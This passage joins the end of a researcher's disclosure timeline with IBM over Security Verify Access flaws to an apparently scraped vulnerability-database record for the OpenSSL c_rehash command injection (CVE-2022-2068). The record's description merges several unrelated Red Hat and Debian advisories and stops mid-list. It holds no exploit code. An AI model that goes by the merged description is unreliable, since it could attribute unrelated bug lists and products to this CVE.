- Feb 28, 2024: I asked IBM to clarify where the documentation specified that the runtime should not be exposed. For example, https://www.ibm.com/docs/en/sva/10.0.7?topic=support-docker-image-verify-access-runtime did not explain that exposing this runtime on the network was a high security risk.
- Mar 4, 2024: Regarding the vulnerabilities found in ibmsecurity, IBM said that any security vulnerability found in ibmsecurity must be reported by opening an issue in the GitHub repository.
- Mar 8, 2024: IBM confirmed they were able to reproduce the authentication bypass vulnerability.
- Mar 12, 2024: IBM confirmed they would add an optional MTLS authentication in the next release (10.0.8) and they would update the ISVA documentation to block any attempt of the authentication bypass vulnerability.
- Mar 29, 2024: IBM published a new security bulletin: https://www.ibm.com/support/pages/node/7145400.
- Mar 29, 2024: IBM confirmed that any security vulnerability found in ibmsecurity must be reported by opening an issue in the GitHub repository.
- Apr 1, 2024: Creation of https://github.com/IBM-Security/ibmsecurity/issues/416.
- Apr 2, 2024: IBM confirmed the reception of the report https://github.com/IBM-Security/ibmsecurity/issues/416#issuecomment-2032110397.
- Apr 3, 2024: https://github.com/IBM-Security/ibmsecurity/issues/416 was entirely redacted by IBM.
- Apr 5, 2024: I asked if the vulnerabilities would be patched in the #416 issue (https://github.com/IBM-Security/ibmsecurity/issues/416).
- Apr 6, 2024: Issue #416 (https://github.com/IBM-Security/ibmsecurity/issues/416) was closed.
- Apr 6, 2024: I re-added the content of https://github.com/IBM-Security/ibmsecurity/issues/416 and asked if CVEs would be published.
- Apr 10, 2024: Security bulletin for ibmsecurity published: https://www.ibm.com/support/pages/node/7147932.
- Apr 10, 2024: I contacted IBM regarding a new security bulletin, https://www.ibm.com/support/pages/node/7145828, which potentially covered a vulnerability I had reported.
- Apr 10, 2024: IBM said this security bulletin was unrelated to the vulnerabilities I reported.
- Apr 15, 2024: IBM confirmed that the final vulnerabilities would be fixed in ISVA 10.0.8.
- Apr 15, 2024: I provided a list of unfixed vulnerabilities and asked for more information.
- Apr 16, 2024: IBM confirmed that all the unfixed vulnerabilities would be fixed in ISVA 10.0.8 and asked to close the ticket.
- Apr 16, 2024: I replied that this ticket could be closed only when the security patches were available.
- Apr 16, 2024: IBM confirmed they wanted to close the ticket because nothing would be updated before mid-2024.
- Apr 17, 2024: I replied that "It makes no sense to close this ticket until the vulnerabilities have been fixed. The fact that the vulnerabilities are fixed mid-year is a decision made by IBM. IBM was made aware of these vulnerabilities over a year ago, and yet we are still waiting for security patches. If this ticket is closed, I would consider that the vulnerabilities have been fixed and it is perfectly fine to publish the technical analysis."
- May 6, 2024: IBM closed the existing ticket and opened new tickets for the remaining vulnerabilities.
- May 6, 2024: I contacted IBM PSIRT asking if it was fine to publish the vulnerabilities since the ticket was closed by IBM.
- May 7, 2024: I reopened the ticket stating that some of the patched vulnerabilities did not receive a CVE and there were also some unpatched vulnerabilities. I asked IBM to provide me with the CVE assigned to each vulnerability. I also asked IBM to confirm that, since this ticket had been closed by IBM, all the vulnerabilities had been fixed and that I would be able to publish the technical details.
- May 8, 2024: IBM said they would review the list of vulnerabilities.
- May 10, 2024: IBM PSIRT asked me not to publish technical details of unpatched vulnerabilities.
- May 17, 2024: IBM provided me with an incomplete list of CVEs, with different vulnerabilities grouped under the same CVE identifier, and asked to close the ticket.
- May 20, 2024: IBM asked for my comments on the list of CVEs.
- May 20, 2024: I confirmed that several CVEs were missing and the list was incomplete.
- May 21, 2024: IBM provided me with an explanation regarding the missing CVEs.
- May 21, 2024: I asked IBM to quote their explanation in the security advisory.
- May 21, 2024: IBM asked to have a meeting.
- May 22, 2024: I replied that I would prefer written communication since it was very difficult to track the status of the vulnerabilities with (1) CVEs obtained only several months after the release of security bulletins, (2) tickets closed by IBM for unpatched vulnerabilities, (3) vulnerabilities in ibmsecurity which could be corrected by IBM and which could then no longer be managed by IBM, and (4) missing CVEs.
- May 22, 2024: IBM asked to have a meeting to remove any confusion.
- May 23, 2024: I replied that there was not much confusion apart from the missing CVEs for silently patched vulnerabilities and the lack of communication from IBM when releasing security patches. I asked IBM to map each CVE to the corresponding vulnerability and to indicate which security bulletins covered which vulnerabilities.
- May 24, 2024: IBM stated they would provide me with additional CVEs.
- May 30, 2024: I agreed that the creation of additional CVEs was fair.
- Jun 2, 2024: IBM confirmed 3 new CVEs in a new security bulletin: https://www.ibm.com/support/pages/node/7155356.
- Jun 3, 2024: I asked IBM for the release date of the 10.0.8 version.
- Jun 3, 2024: IBM confirmed that the exact date was not yet decided.
- Jun 6, 2024: IBM asked if I had comments about the remaining vulnerabilities.
- Jun 8, 2024: I asked IBM about the status of a supposedly patched vulnerability.
- Jun 10, 2024: IBM confirmed that this vulnerability had not been previously patched and would be patched in the 10.0.8 release.
- Jun 11, 2024: IBM asked to create separate cases for the remaining vulnerabilities.
- Jun 19, 2024: IBM asked if I needed assistance.
- Jun 23, 2024: IBM confirmed that the 10.0.8 version was released and that they would close the ticket tracking the vulnerabilities.
- Jun 26, 2024: I asked IBM to provide the corresponding CVEs and the link of the security bulletin.
- Jun 27, 2024: IBM provided me with the link to the security bulletin: https://www.ibm.com/support/pages/node/7158790 and said that the 10.0.8 version was released with all the patched vulnerabilities. IBM closed the ticket.
- Jul 3, 2024: I reopened the ticket and asked IBM to provide me with the list of vulnerabilities with the corresponding CVEs since I was not able to correctly map the CVEs to the vulnerabilities I reported.
- Jul 8, 2024: IBM provided me with the list of CVEs. IBM closed the ticket.
- Sep 7, 2024: I sent an email to IBM PSIRT stating that I was going to publish the security advisory and that some CVEs were still missing. I also stated that CVE-2023-38371 seemed to be an error since it was confirmed not to be a vulnerability according to our previous email exchanges.
- Sep 9, 2024: I asked IBM to provide me with an official link regarding the runtime authentication bypass, to publish it in the security advisory.
- Sep 13, 2024: IBM PSIRT provided me with (1) links regarding the runtime authentication bypass and (2) additional CVEs. They also confirmed that at least one vulnerability was not fixed and asked me not to disclose this finding until it was patched. No information was provided about when this vulnerability would be patched.
- Nov 1, 2024: The security advisory was published.
Credits
These vulnerabilities were found by Pierre Barre aka Pierre Kim (@PierreKimSec).
References
https://pierrekim.github.io/blog/2024-11-01-ibm-security-verify-access-32-vulnerabilities.html
https://pierrekim.github.io/advisories/2024-ibm-security-verify-access.txt
https://pierrekim.github.io/blog/2024-11-01-ibmsecurity-4-vulnerabilities.html
https://pierrekim.github.io/advisories/2024-ibmsecurity.txt
https://www.ibm.com/support/pages/node/7106586
https://www.ibm.com/support/pages/node/7145400
https://www.ibm.com/support/pages/node/7155356
https://www.ibm.com/support/pages/node/7158790
Disclaimer
This advisory is licensed under a Creative Commons Attribution Non-Commercial Share-Alike 3.0 License: http://creativecommons.org/licenses/by-nc-sa/3.0/
-----BEGIN PGP SIGNATURE-----

iQIzBAEBCgAdFiEEoSgI9MSrzxDXWrmCxD4O2n2TLbwFAmckrf4ACgkQxD4O2n2T
LbzphQ//dkcrCH8Q+yNrjdYoxvY/wXwc1JfgXxmLK7Ns3N5qFJVT70Uea6HjIoHz
eJQurricioTP8jG48J2uzIt7l4G4Kgv0zP+aPN/KXjfYghu46N4G29458OgXTHVe
ecOmouy/za1DG6qtST+sbicDhX5oku4VtdQ+NtDXaoLUAkADp/wJ3rLv5Fdw7gxQ
VR0OMUTsy50Vv1bRN2R77ZAs/odAY67pQfTw8QpKLDDLBZveeAwBLgc66rQ+KZjq
mPbLUULFlZp3+EYnR+XyZXu2nNGZDhTVMKAYCGzuqr3/boIz1BF7rifK07tL8+EE
+NQQK3kzauWuQ/Sl5X20kfvdC91g7d/G93Me+Uz9iSfB9cyDfAdCLNf6fyYi/xjE
qz6HNe2capSG7GBeCK6Q8ffb95kojjKrmyL2eKj2Yz5ZCWuDXa0L6pLwHZ9KSyjj
24kykmiHI4bCKBCXazBVYcdguk+6PCcenAGxLIpKdmTcMvaUUbN/c2jUenjV8/As
+akcA48mNjuITE+Qei9kn7R5huTSCZffws9j4r0P86dst0ZkYfNSWgThatk2NRwC
V8D2DOXdxpXThuOAMfN4b9ViLYTeHm2/JGvl0RLQNyNSv2rWeeEch6Z69NsS/Fq7
Y7L55juYeCFtkTrdYA+tkaUHlvX8uQC9GoKkcUOfYV6utGQ4fnU=
=3Ax6
-----END PGP SIGNATURE-----
{
"affected_products": {
"_id": null,
"data": [
{
"_id": null,
"model": "h610s",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "openssl",
"scope": "lt",
"trust": 1.0,
"vendor": "openssl",
"version": "3.0.4"
},
{
"_id": null,
"model": "snapmanager",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "h700s",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "h410c",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "aff a400",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "ontap select deploy administration utility",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "fedora",
"scope": "eq",
"trust": 1.0,
"vendor": "fedoraproject",
"version": "35"
},
{
"_id": null,
"model": "sannav",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": null
},
{
"_id": null,
"model": "openssl",
"scope": "gte",
"trust": 1.0,
"vendor": "openssl",
"version": "1.0.2"
},
{
"_id": null,
"model": "solidfire",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "h410s",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "h615c",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "hci management node",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "linux",
"scope": "eq",
"trust": 1.0,
"vendor": "debian",
"version": "10.0"
},
{
"_id": null,
"model": "sinec ins",
"scope": "eq",
"trust": 1.0,
"vendor": "siemens",
"version": "1.0"
},
{
"_id": null,
"model": "openssl",
"scope": "lt",
"trust": 1.0,
"vendor": "openssl",
"version": "1.1.1p"
},
{
"_id": null,
"model": "linux",
"scope": "eq",
"trust": 1.0,
"vendor": "debian",
"version": "11.0"
},
{
"_id": null,
"model": "h300s",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "fedora",
"scope": "eq",
"trust": 1.0,
"vendor": "fedoraproject",
"version": "36"
},
{
"_id": null,
"model": "fas 8300",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "bootstrap os",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "fas 8700",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "fas a400",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "openssl",
"scope": "lt",
"trust": 1.0,
"vendor": "openssl",
"version": "1.0.2zf"
},
{
"_id": null,
"model": "aff 8700",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "aff 8300",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "h610c",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "h500s",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "element software",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "sinec ins",
"scope": "lt",
"trust": 1.0,
"vendor": "siemens",
"version": "1.0"
},
{
"_id": null,
"model": "openssl",
"scope": "gte",
"trust": 1.0,
"vendor": "openssl",
"version": "1.1.1"
},
{
"_id": null,
"model": "smi-s provider",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "openssl",
"scope": "gte",
"trust": 1.0,
"vendor": "openssl",
"version": "3.0.0"
},
{
"_id": null,
"model": "ontap antivirus connector",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "santricity smi-s provider",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2022-2068"
}
]
},
"credits": {
"_id": null,
"data": "Red Hat",
"sources": [
{
"db": "PACKETSTORM",
"id": "168022"
},
{
"db": "PACKETSTORM",
"id": "168112"
},
{
"db": "PACKETSTORM",
"id": "170741"
},
{
"db": "PACKETSTORM",
"id": "170196"
},
{
"db": "PACKETSTORM",
"id": "170165"
},
{
"db": "PACKETSTORM",
"id": "170179"
}
],
"trust": 0.6
},
"cve": "CVE-2022-2068",
"cvss": {
"_id": null,
"data": [
{
"cvssV2": [
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "nvd@nist.gov",
"availabilityImpact": "COMPLETE",
"baseScore": 10.0,
"confidentialityImpact": "COMPLETE",
"exploitabilityScore": 10.0,
"id": "CVE-2022-2068",
"impactScore": 10.0,
"integrityImpact": "COMPLETE",
"severity": "HIGH",
"trust": 1.1,
"vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"author": "nvd@nist.gov",
"availabilityImpact": "HIGH",
"baseScore": 7.3,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 1.3,
"id": "CVE-2022-2068",
"impactScore": 5.9,
"integrityImpact": "HIGH",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H",
"version": "3.1"
},
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"availabilityImpact": "HIGH",
"baseScore": 9.8,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 3.9,
"id": "CVE-2022-2068",
"impactScore": 5.9,
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
}
],
"severity": [
{
"author": "nvd@nist.gov",
"id": "CVE-2022-2068",
"trust": 1.0,
"value": "HIGH"
},
{
"author": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"id": "CVE-2022-2068",
"trust": 1.0,
"value": "CRITICAL"
},
{
"author": "VULMON",
"id": "CVE-2022-2068",
"trust": 0.1,
"value": "HIGH"
}
]
}
],
"sources": [
{
"db": "VULMON",
"id": "CVE-2022-2068"
},
{
"db": "NVD",
"id": "CVE-2022-2068"
},
{
"db": "NVD",
"id": "CVE-2022-2068"
}
]
},
"description": {
"_id": null,
"data": "In addition to the c_rehash shell command injection identified in CVE-2022-1292, further circumstances where the c_rehash script does not properly sanitise shell metacharacters to prevent command injection were found by code review. When the CVE-2022-1292 was fixed it was not discovered that there are other places in the script where the file names of certificates being hashed were possibly passed to a command executed through the shell. This script is distributed by some operating systems in a manner where it is automatically executed. On such operating systems, an attacker could execute arbitrary commands with the privileges of the script. Use of the c_rehash script is considered obsolete and should be replaced by the OpenSSL rehash command line tool. Fixed in OpenSSL 3.0.4 (Affected 3.0.0,3.0.1,3.0.2,3.0.3). Fixed in OpenSSL 1.1.1p (Affected 1.1.1-1.1.1o). Fixed in OpenSSL 1.0.2zf (Affected 1.0.2-1.0.2ze). (CVE-2022-2068). Description:\n\nRed Hat Ceph Storage is a scalable, open, software-defined storage platform\nthat combines the most stable version of the Ceph storage system with a\nCeph management platform, deployment utilities, and support services. \n\nSpace precludes documenting all of these changes in this advisory. Bugs fixed (https://bugzilla.redhat.com/):\n\n2031228 - CVE-2021-43813 grafana: directory traversal vulnerability\n2044628 - CVE-2022-21673 grafana: Forward OAuth Identity Token can allow users to access some data sources\n2115198 - build ceph containers for RHCS 5.2 release\n\n5. \n\nFor the oldstable distribution (buster), this problem has been fixed\nin version 1.1.1n-0+deb10u3. \n\nFor the stable distribution (bullseye), this problem has been fixed in\nversion 1.1.1n-0+deb11u3. \n\nWe recommend that you upgrade your openssl packages. 
\n\nFor the detailed security status of openssl please refer to\nits security tracker page at:\nhttps://security-tracker.debian.org/tracker/openssl\n\nFurther information about Debian Security Advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: https://www.debian.org/security/\n\nMailing list: debian-security-announce@lists.debian.org\n-----BEGIN PGP SIGNATURE-----\n\niQIzBAEBCgAdFiEEtuYvPRKsOElcDakFEMKTtsN8TjYFAmK4pF0ACgkQEMKTtsN8\nTjYP5g//SyfB1W/vUNmgeSp2kKu3vt9CPwoXMK8nhTcA7iYhkxIJTFxAWDpn+4S7\nW4kYyxMRFSIHKv4FLiLgi/Vzn4g1kB1UvKv05CFhEJqpWMyyRj6FdmebLlkLG0eE\nIGsZoQl9be+lRJ+E4oMMkrRkbJV5II7s69vdxFDh4893Ndx05GWWvXT5Doc5gFMi\nNoNabBH47GFU6aGDwVJU+xooBT6s4QMOrgVKYbxhM5PO98HQzk0zv0Z6YRx7FzKD\nhYMN/t6A8qj4zMQqJqM+44q9zpDryyolGLewvgOit1HFFnLlBf4wsdBvE7AGhvGs\nLam5OXLhlwlQT6gBNd4XFAShdEZGLVF2DCgKzMh5cG5r2W10ewfHHyOR4CnkMQQP\nePA8YvhVwSH3I5jOTS75A18LXpoRJKRXQuQ7v9di2C8qRZ0qnM95h0KzH9/UKyUc\nTmF09MTKWoFCkCtyzucdPnoyUPhdScJc08jcGJ37MCb8uKI4F5jVImLnHC6qS6Oc\nGab3OPIDzS8I1rro0J1k8RJE1E8XvfCxgVAOoebn0mst8qT+38hqsTFykG+uq3dN\nsfhwI+E8iOeVOapyDVzxz8DfIkyBdnFsM4cg9VxDPOOllN+BknySqvzxu+aYpMFz\nK/D6g421XIIXPXD+sP/w1ENPV7LFobRR7KXUWvjS5l/Ir8dhPdQ=\n=tiWq\n-----END PGP SIGNATURE-----\n. \n\nRed Hat Product Security has rated this update as having a security impact\nof Important. A Common Vulnerability Scoring System (CVSS) base score,\nwhich gives a detailed severity rating, is available for each vulnerability\nfrom the CVE link(s) in the References section. \n\n2. 
Description:\n\nLogging Subsystem 5.5.0 - Red Hat OpenShift\n\nSecurity Fix(es):\n\n* kubeclient: kubeconfig parsing error can lead to MITM attacks\n(CVE-2022-0759)\n\n* golang: compress/gzip: stack exhaustion in Reader.Read (CVE-2022-30631)\n\n* golang: out-of-bounds read in golang.org/x/text/language leads to DoS\n(CVE-2021-38561)\n\n* prometheus/client_golang: Denial of service using\nInstrumentHandlerCounter (CVE-2022-21698)\n\nFor more details about the security issue(s), including the impact, a CVSS\nscore, acknowledgments, and other related information, refer to the CVE\npage(s) listed in the References section. \n\n3. Solution:\n\nFor details on how to apply this update, which includes the changes\ndescribed in this advisory, refer to:\n\nhttps://access.redhat.com/articles/11258\n\n4. Bugs fixed (https://bugzilla.redhat.com/):\n\n2045880 - CVE-2022-21698 prometheus/client_golang: Denial of service using InstrumentHandlerCounter\n2058404 - CVE-2022-0759 kubeclient: kubeconfig parsing error can lead to MITM attacks\n2100495 - CVE-2021-38561 golang: out-of-bounds read in golang.org/x/text/language leads to DoS\n2107342 - CVE-2022-30631 golang: compress/gzip: stack exhaustion in Reader.Read\n\n5. JIRA issues fixed (https://issues.jboss.org/):\n\nLOG-1415 - Allow users to tune fluentd\nLOG-1539 - Events and CLO csv are not collected after running `oc adm must-gather --image=$downstream-clo-image `\nLOG-1713 - Reduce Permissions granted for prometheus-k8s service account\nLOG-2063 - Collector pods fail to start when a Vector only Cluster Logging instance is created. \nLOG-2134 - The infra logs are sent to app-xx indices\nLOG-2159 - Cluster Logging Pods in CrashLoopBackOff\nLOG-2165 - [Vector] Default log level debug makes it hard to find useful error/failure messages. \nLOG-2167 - [Vector] Collector pods fails to start with configuration error when using Kafka SASL over SSL\nLOG-2169 - [Vector] Logs not being sent to Kafka with SASL plaintext. 
\nLOG-2172 - [vector]The openshift-apiserver and ovn audit logs can not be collected. \nLOG-2242 - Log file metric exporter is still following /var/log/containers files. \nLOG-2243 - grafana-dashboard-cluster-logging should be deleted once clusterlogging/instance was removed\nLOG-2264 - Logging link should contain an icon\nLOG-2274 - [Logging 5.5] EO doesn\u0027t recreate secrets kibana and kibana-proxy after removing them. \nLOG-2276 - Fluent config format is hard to read via configmap\nLOG-2290 - ClusterLogging Instance status in not getting updated in UI\nLOG-2291 - [release-5.5] Events listing out of order in Kibana 6.8.1\nLOG-2294 - [Vector] Vector internal metrics are not exposed via HTTPS due to which OpenShift Monitoring Prometheus service cannot scrape the metrics endpoint. \nLOG-2300 - [Logging 5.5]ES pods can\u0027t be ready after removing secret/signing-elasticsearch\nLOG-2303 - [Logging 5.5] Elasticsearch cluster upgrade stuck\nLOG-2308 - configmap grafana-dashboard-elasticsearch is being created and deleted continously\nLOG-2333 - Journal logs not reaching Elasticsearch output\nLOG-2337 - [Vector] Missing @ prefix from the timestamp field in log record. \nLOG-2342 - [Logging 5.5] Kibana pod can\u0027t connect to ES cluster after removing secret/signing-elasticsearch: \"x509: certificate signed by unknown authority\"\nLOG-2384 - Provide a method to get authenticated from GCP\nLOG-2411 - [Vector] Audit logs forwarding not working. \nLOG-2412 - CLO\u0027s loki output url is parsed wrongly\nLOG-2413 - PriorityClass cluster-logging is deleted if provide an invalid log type\nLOG-2418 - EO supported time units don\u0027t match the units specified in CRDs. \nLOG-2439 - Telemetry: the managedStatus\u0026healthStatus\u0026version values are wrong\nLOG-2440 - [loki-operator] Live tail of logs does not work on OpenShift\nLOG-2444 - The write index is removed when `the size of the index` \u003e `diskThresholdPercent% * total size`. 
\nLOG-2460 - [Vector] Collector pods fail to start on a FIPS enabled cluster. \nLOG-2461 - [Vector] Vector auth config not generated when user provided bearer token is used in a secret for connecting to LokiStack. \nLOG-2463 - Elasticsearch operator repeatedly prints error message when checking indices\nLOG-2474 - EO shouldn\u0027t grant cluster-wide permission to system:serviceaccount:openshift-monitoring:prometheus-k8s when ES cluster is deployed. [openshift-logging 5.5]\nLOG-2522 - CLO supported time units don\u0027t match the units specified in CRDs. \nLOG-2525 - The container\u0027s logs are not sent to separate index if the annotation is added after the pod is ready. \nLOG-2546 - TLS handshake error on loki-gateway for FIPS cluster\nLOG-2549 - [Vector] [master] Journald logs not sent to the Log store when using Vector as collector. \nLOG-2554 - [Vector] [master] Fallback index is not used when structuredTypeKey is missing from JSON log data\nLOG-2588 - FluentdQueueLengthIncreasing rule failing to be evaluated. \nLOG-2596 - [vector]the condition in [transforms.route_container_logs] is inaccurate\nLOG-2599 - Supported values for level field don\u0027t match documentation\nLOG-2605 - $labels.instance is empty in the message when firing FluentdNodeDown alert\nLOG-2609 - fluentd and vector are unable to ship logs to elasticsearch when cluster-wide proxy is in effect\nLOG-2619 - containers violate PodSecurity -- Log Exporation\nLOG-2627 - containers violate PodSecurity -- Loki\nLOG-2649 - Level Critical should match the beginning of the line as the other levels\nLOG-2656 - Logging uses deprecated v1beta1 apis\nLOG-2664 - Deprecated Feature logs causing too much noise\nLOG-2665 - [Logging 5.5] Sometimes collector fails to push logs to Elasticsearch cluster\nLOG-2693 - Integration with Jaeger fails for ServiceMonitor\nLOG-2700 - [Vector] vector container can\u0027t start due to \"unknown field `pod_annotation_fields`\" . 
\nLOG-2703 - Collector DaemonSet is not removed when CLF is deleted for fluentd/vector only CL instance\nLOG-2725 - Upgrade logging-eventrouter Golang version and tags\nLOG-2731 - CLO keeps reporting `Reconcile ServiceMonitor retry error` and `Reconcile Service retry error` after creating clusterlogging. \nLOG-2732 - Prometheus Operator pod throws \u0027skipping servicemonitor\u0027 error on Jaeger integration\nLOG-2742 - unrecognized outputs when use the sts role secret\nLOG-2746 - CloudWatch forwarding rejecting large log events, fills tmpfs\nLOG-2749 - OpenShift Logging Dashboard for Elastic Shards shows \"active_primary\" instead of \"active\" shards. \nLOG-2753 - Update Grafana configuration for LokiStack integration on grafana/loki repo\nLOG-2763 - [Vector]{Master} Vector\u0027s healthcheck fails when forwarding logs to Lokistack. \nLOG-2764 - ElasticSearch operator does not respect referencePolicy when selecting oauth-proxy image\nLOG-2765 - ingester pod can not be started in IPv6 cluster\nLOG-2766 - [vector] failed to parse cluster url: invalid authority IPv6 http-proxy\nLOG-2772 - arn validation failed when role_arn=arn:aws-us-gov:xxx\nLOG-2773 - No cluster-logging-operator-metrics service in logging 5.5\nLOG-2778 - [Vector] [OCP 4.11] SA token not added to Vector config when connecting to LokiStack instance without CLF creds secret required by LokiStack. \nLOG-2784 - Japanese log messages are garbled at Kibana\nLOG-2793 - [Vector] OVN audit logs are missing the level field. \nLOG-2864 - [vector] Can not sent logs to default when loki is the default output in CLF\nLOG-2867 - [fluentd] All logs are sent to application tenant when loki is used as default logstore in CLF. \nLOG-2873 - [Vector] Cannot configure CPU/Memory requests/limits when using Vector as collector. 
\nLOG-2875 - Seeing a black rectangle box on the graph in Logs view\nLOG-2876 - The link to the \u0027Container details\u0027 page on the \u0027Logs\u0027 screen throws error\nLOG-2877 - When there is no query entered, seeing error message on the Logs view\nLOG-2882 - RefreshIntervalDropdown and TimeRangeDropdown always set back to its original values when switching between pages in \u0027Logs\u0027 screen\n\n6. References:\n\nhttps://access.redhat.com/security/cve/CVE-2021-38561\nhttps://access.redhat.com/security/cve/CVE-2022-0759\nhttps://access.redhat.com/security/cve/CVE-2022-1012\nhttps://access.redhat.com/security/cve/CVE-2022-1292\nhttps://access.redhat.com/security/cve/CVE-2022-1586\nhttps://access.redhat.com/security/cve/CVE-2022-1785\nhttps://access.redhat.com/security/cve/CVE-2022-1897\nhttps://access.redhat.com/security/cve/CVE-2022-1927\nhttps://access.redhat.com/security/cve/CVE-2022-2068\nhttps://access.redhat.com/security/cve/CVE-2022-2097\nhttps://access.redhat.com/security/cve/CVE-2022-21698\nhttps://access.redhat.com/security/cve/CVE-2022-30631\nhttps://access.redhat.com/security/cve/CVE-2022-32250\nhttps://access.redhat.com/security/updates/classification/#important\n\n7. Contact:\n\nThe Red Hat security contact is \u003csecalert@redhat.com\u003e. More contact\ndetails at https://access.redhat.com/security/team/contact/\n\nCopyright 2022 Red Hat, Inc. Summary:\n\nRed Hat OpenShift Virtualization release 4.12 is now available with updates\nto packages and images that fix several bugs and add enhancements. Description:\n\nOpenShift Virtualization is Red Hat\u0027s virtualization solution designed for\nRed Hat OpenShift Container Platform. 
\n\nRHEL-8-CNV-4.12\n\n=============\nbridge-marker-container-v4.12.0-24\ncluster-network-addons-operator-container-v4.12.0-24\ncnv-containernetworking-plugins-container-v4.12.0-24\ncnv-must-gather-container-v4.12.0-58\nhco-bundle-registry-container-v4.12.0-769\nhostpath-csi-driver-container-v4.12.0-30\nhostpath-provisioner-container-v4.12.0-30\nhostpath-provisioner-operator-container-v4.12.0-31\nhyperconverged-cluster-operator-container-v4.12.0-96\nhyperconverged-cluster-webhook-container-v4.12.0-96\nkubemacpool-container-v4.12.0-24\nkubevirt-console-plugin-container-v4.12.0-182\nkubevirt-ssp-operator-container-v4.12.0-64\nkubevirt-tekton-tasks-cleanup-vm-container-v4.12.0-55\nkubevirt-tekton-tasks-copy-template-container-v4.12.0-55\nkubevirt-tekton-tasks-create-datavolume-container-v4.12.0-55\nkubevirt-tekton-tasks-create-vm-from-template-container-v4.12.0-55\nkubevirt-tekton-tasks-disk-virt-customize-container-v4.12.0-55\nkubevirt-tekton-tasks-disk-virt-sysprep-container-v4.12.0-55\nkubevirt-tekton-tasks-modify-vm-template-container-v4.12.0-55\nkubevirt-tekton-tasks-operator-container-v4.12.0-40\nkubevirt-tekton-tasks-wait-for-vmi-status-container-v4.12.0-55\nkubevirt-template-validator-container-v4.12.0-32\nlibguestfs-tools-container-v4.12.0-255\novs-cni-marker-container-v4.12.0-24\novs-cni-plugin-container-v4.12.0-24\nvirt-api-container-v4.12.0-255\nvirt-artifacts-server-container-v4.12.0-255\nvirt-cdi-apiserver-container-v4.12.0-72\nvirt-cdi-cloner-container-v4.12.0-72\nvirt-cdi-controller-container-v4.12.0-72\nvirt-cdi-importer-container-v4.12.0-72\nvirt-cdi-operator-container-v4.12.0-72\nvirt-cdi-uploadproxy-container-v4.12.0-71\nvirt-cdi-uploadserver-container-v4.12.0-72\nvirt-controller-container-v4.12.0-255\nvirt-exportproxy-container-v4.12.0-255\nvirt-exportserver-container-v4.12.0-255\nvirt-handler-container-v4.12.0-255\nvirt-launcher-container-v4.12.0-255\nvirt-operator-container-v4.12.0-255\nvirtio-win-container-v4.12.0-10\nvm-network-latency-checkup-
